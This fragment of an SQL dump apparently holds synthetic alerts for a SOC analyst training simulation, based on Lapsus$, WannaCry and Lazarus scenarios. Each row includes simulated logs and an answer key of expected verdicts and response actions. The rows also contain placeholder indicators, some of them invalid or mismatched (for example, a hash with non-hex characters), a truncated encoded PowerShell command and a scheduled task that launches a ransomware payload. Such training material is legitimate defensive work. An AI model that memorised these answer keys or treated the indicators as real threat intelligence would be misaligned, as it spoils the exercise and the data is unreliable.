activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a malware toolkit.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"recon.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Script used for unauthorized network exploration.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(917, 'Backdoor Established on Critical Servers', 'high', 'Server Logs', 'A persistent backdoor was installed on critical servers by Lapsus$, enabling continued undetected access.', 'Persistence', 'T1055 - Process Injection', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.10\",\"username\":\"admin_user\",\"process_name\":\"svchost.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"process_injection\",\"message\":\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\"}', '2026-01-15 01:03:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal AD\",\"verdict\":\"suspicious\",\"details\":\"Admin user was compromised for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lapsus$ backdoor malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(918, 'Lateral Movement Across Development Environment', 'high', 'User Activity Monitoring', 'Using compromised admin accounts, threat actors moved laterally across the development environment targeting repositories with Galaxy device bootloaders and TrustZone security code.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"user_activity\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"10.0.0.23\",\"external_attacker_ip\":\"203.0.113.45\",\"compromised_username\":\"admin_user1\",\"action\":\"access_repository\",\"repository_name\":\"GalaxyBootloaders\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_accessed\":\"TrustZone_code.zip\"}', '2026-01-15 01:03:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted repository server.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user1\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_system\",\"verdict\":\"suspicious\",\"details\":\"Compromised account used for unauthorized access.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Known malware hash used in lateral movement activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(919, 'Massive Data Exfiltration to External Servers', 'critical', 'Data Loss Prevention (DLP) System', 'The final phase of the operation involved transferring 190GB of sensitive source code to external servers. The threat actor Lapsus$ utilized a compromised internal server to exfiltrate the data to an external IP. Subsequently, they leveraged Telegram to initiate extortion, threatening to release the data unless their demands were met.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:53:22Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.77\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"john.doe\",\"file_hash\":\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\",\"file_name\":\"sensitive_source_code.zip\",\"transfer_size\":\"190GB\",\"malware_associated\":false,\"communication_tool\":\"Telegram\"}', '2026-01-15 01:03:01', '2026-02-16 17:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"open_threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP address known for data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_source_code.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_dlp_system\",\"verdict\":\"suspicious\",\"details\":\"File name matches pattern of sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp_system\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with unauthorized data transfer.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised during data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\",\"reset_credentials\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(920, 'Initial Access via Exploit of SMB Vulnerability', 'high', 'Network Intrusion Detection System (NIDS)', 'An attacker exploited a known SMB vulnerability in unpatched Windows XP systems within the NHS network. This vulnerability allowed unauthorized access to internal systems, risking sensitive data exposure and potential system compromise.', 'Exploitation', 'T1190 - Exploit Public-Facing Application', 1, 'investigating', 34, '{\"timestamp\":\"2023-10-11T14:23:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.10\",\"protocol\":\"SMB\",\"exploit\":\"EternalBlue\",\"action\":\"access_granted\",\"username\":\"NHS_admin\",\"file_accessed\":\"confidential_patient_data.doc\",\"hash\":\"a6d7f4c8b3e2f0d5f3d9a6b8c7e9d0a1\",\"alert_id\":\"NIDS-20231011-001\",\"malware_associated\":\"WannaCry\"}', '2026-01-15 01:03:39', '2026-03-15 02:37:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous SMB exploits\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal NHS network system\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a6d7f4c8b3e2f0d5f3d9a6b8c7e9d0a1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_patient_data.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during exploit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(921, 'Execution of WannaCry Ransomware', 'critical', 'Endpoint Detection and Response (EDR)', 'The EDR system detected the execution of WannaCry ransomware attempting to encrypt critical hospital files and systems. This activity is consistent with advanced tactics employed by the Lazarus Group, aiming to disrupt operations and demand ransom for decryption keys.', 'Malware Deployment', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_type\":\"execution\",\"source_ip\":\"185.92.220.0\",\"destination_ip\":\"192.168.15.10\",\"username\":\"hospital_admin\",\"filename\":\"wannacry.exe\",\"file_hash\":\"f4eac8d83b1f920b8b8d3b6c3c3a3f4e\",\"event_description\":\"Execution of malicious payload detected\",\"process_id\":4321,\"command_line\":\"C:\\\\Windows\\\\System32\\\\wannacry.exe\",\"alert_severity\":\"Critical\"}', '2026-01-15 01:03:39', '2026-02-16 17:54:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.15.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal hospital network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"malicious\",\"details\":\"Known ransomware executable.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f4eac8d83b1f920b8b8d3b6c3c3a3f4e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known WannaCry ransomware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(922, 'Establishing Persistence through Scheduled Tasks', 'high', 'System Logs', 'The Lazarus Group has established persistence on a compromised system by creating a scheduled task that executes their ransomware payload, ensuring continued access even after initial detection and response attempts.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4698\",\"task_category\":\"Task Created\",\"computer\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\ScheduledTasks\\\\PersistenceTask\",\"task_content\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start C:\\\\Users\\\\Public\\\\Documents\\\\ransomware_payload.exe\",\"task_author\":\"Administrator\",\"source_ip\":\"192.168.1.5\",\"attacker_ip\":\"104.27.142.15\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"ransomware_payload.exe\",\"user_account\":\"admin_user\"}', '2026-01-15 01:03:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.27.142.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as ransomware payload related to Lazarus 